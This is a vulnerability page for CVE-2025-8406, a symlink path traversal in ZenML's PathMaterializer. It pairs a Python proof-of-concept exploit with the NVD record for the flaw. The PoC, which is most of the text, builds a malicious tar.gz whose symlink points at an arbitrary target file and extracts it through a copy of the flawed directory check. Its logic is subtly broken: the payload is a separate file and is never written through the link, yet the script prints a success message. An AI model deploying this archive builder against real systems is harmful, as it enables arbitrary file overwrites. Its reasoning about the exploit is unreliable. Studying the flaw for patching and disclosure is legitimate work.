CVE-2025-8406

#!/usr/bin/env python3 """ CVE-2025-8406 - ZenML PathMaterializer Path Traversal PoC Vulnerability: Path traversal via symbolic/hard links in data.tar.gz extraction """ import tarfile import os import io import tempfile def create_malicious_tar(output_path, target_file): """ Create a malicious tar.gz file that exploits the path traversal vulnerability by using a symbolic link to point outside the intended directory. """ with tarfile.open(output_path, "w:gz") as tar: # Add a symbolic link pointing to a sensitive file location symlink_name = "evil_link" info = tarfile.TarInfo(name=symlink_name) info.type = tarfile.SYMTYPE info.linkname = target_file tar.addfile(info) # Add a file that will be written through the symlink payload_content = b"malicious payload content\n" payload_info = tarfile.TarInfo(name="payload.txt") payload_info.size = len(payload_content) tar.addfile(payload_info, io.BytesIO(payload_content)) def exploit_via_symlink(target_file="/tmp/cve_2025_8406_pwned"): """ Main exploit function demonstrating CVE-2025-8406. Creates a malicious archive and simulates the vulnerable extraction process. """ # Create temporary directory for extraction with tempfile.TemporaryDirectory() as extract_dir: # Generate malicious tar.gz malicious_tar = os.path.join(extract_dir, "data.tar.gz") create_malicious_tar(malicious_tar, target_file) # Simulate ZenML's PathMaterializer.load() behavior # The vulnerable is_path_within_directory fails to detect symlinks with tarfile.open(malicious_tar, "r:gz") as tar: for member in tar.getmembers(): # Vulnerable check: doesn't properly handle symlinks if not is_path_within_directory_vulnerable( os.path.join(extract_dir, member.name), extract_dir ): print(f"[BLOCKED] {member.name}") continue print(f"[EXTRACTING] {member.name} -> {member.linkname if member.issym() else 'file'}") tar.extract(member, extract_dir) # Verify exploitation if os.path.exists(target_file): print(f"[SUCCESS] File written to: {target_file}") with open(target_file, 'r') as f: print(f"[CONTENT] {f.read()}") def is_path_within_directory_vulnerable(path, directory): """ Simulates the vulnerable is_path_within_directory function. It does NOT resolve symbolic links, allowing traversal. """ abs_path = os.path.abspath(path) abs_directory = os.path.abspath(directory) # Bug: doesn't use os.path.realpath() to resolve symlinks return abs_path.startswith(abs_directory + os.sep) or abs_path == abs_directory if __name__ == "__main__": print("[*] CVE-2025-8406 PoC - ZenML PathMaterializer Path Traversal") print("[*] Creating malicious archive with symbolic link bypass...\n") exploit_via_symlink()

{"cve": {"id": "CVE-2025-8406", "sourceIdentifier": "[email protected]", "published": "2025-10-05T09:15:31.767", "lastModified": "2025-10-30T14:08:25.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZenML version 0.83.1 is affected by a path traversal vulnerability in the `PathMaterializer` class. The `load` function uses `is_path_within_directory` to validate files during `data.tar.gz` extraction, which fails to effectively detect symbolic and hard links. This vulnerability can lead to arbitrary file writes, potentially resulting in arbitrary command execution if critical files are overwritten."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zenml:zenml:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.83.1", "versionEndExcluding": "0.84.2", "matchCriteriaId": "1B8F20EE-6A5B-4B25-BCC7-2E818C5BB8F1"}]}]}], "references": [{"url": "https://github.com/zenml-io/zenml/commit/5d22a48d7bf6c7f10b748577c2be79cc7969d398", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/a0880d64-9928-45bf-9663-2cd81582d9e7", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/a0880d64-9928-45bf-9663-2cd81582d9e7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}